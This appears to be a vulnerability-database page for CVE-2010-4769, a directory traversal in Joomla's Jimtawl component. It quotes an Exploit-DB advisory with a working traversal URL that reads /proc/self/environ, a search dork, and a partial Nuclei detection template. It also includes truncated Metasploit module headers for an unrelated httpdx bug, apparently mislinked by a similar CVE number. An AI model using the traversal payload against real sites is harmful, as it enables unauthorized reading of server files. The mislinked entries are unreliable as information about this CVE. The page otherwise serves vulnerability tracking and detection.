CVE-2010-4769
published 2011-03-23CVE-2010-4769: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have…
PriorityP348high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.59%
93.8th percentile
Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| janguo | com_jimtawl | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
exploitdb·2010-11-20
CVE-2010-4769 Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
---
Joomla Component (com_jimtawl) LFI Vulnerability
Author : Mask_magicianz
Date : November, 20/2010
Location : Medan, Indonesia
Time Zone : GMT +7:00
Application : Package Jimtawl
Dork : com_jimtawl
Contact : Mask_magicianz[at]yahoo[dot]com
http://extensions.joomla.org/extensions/multimedia/streaming-a-broadcasting/audio-broadcasting/4344
http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=[LFI]
http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00
Thanks to : All RosebanditZ Team & All IndonesiaCoder
Exploit-DB
httpdx - 'tolog()' Format String (Metasploit) (1)
exploitdb·2010-08-25
CVE-2009-4769 httpdx - 'tolog()' Format String (Metasploit) (1)
httpdx - 'tolog()' Format String (Metasploit) (1)
---
##
# $Id: httpdx_tolog_format.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HTTPDX tolog() Function Format String Vulnerability',
'Description' => %q{
This module exploits a format string vulnerability in HTTPDX FTP server.
By sending an specially crafted FTP command containing format specifiers, an
attacker can corrupt memory and execute arbitrary code.
By default logging is off for HTTP, but enabled for the 'moderator' user
via FTP.
},
'Author'
Exploit-DB
httpdx - 'tolog()' Format String (Metasploit) (2)
exploitdb·2010-08-25
CVE-2009-4769 httpdx - 'tolog()' Format String (Metasploit) (2)
httpdx - 'tolog()' Format String (Metasploit) (2)
---
##
# $Id: httpdx_tolog_format.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HTTPDX tolog() Function Format String Vulnerability',
'Description' => %q{
This module exploits a format string vulnerability in HTTPDX HTTP server.
By sending an specially crafted HTTP request containing format specifiers, an
attacker can corrupt memory and execute arbitrary code.
By default logging is off for HTTP, but enabled for the 'moderator' user
via FTP.
},
'Author
Nuclei
Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2010-4769 [HIGH] Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.
Template:
id: CVE-2010-4769
info:
name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the la
2011-03-23
Published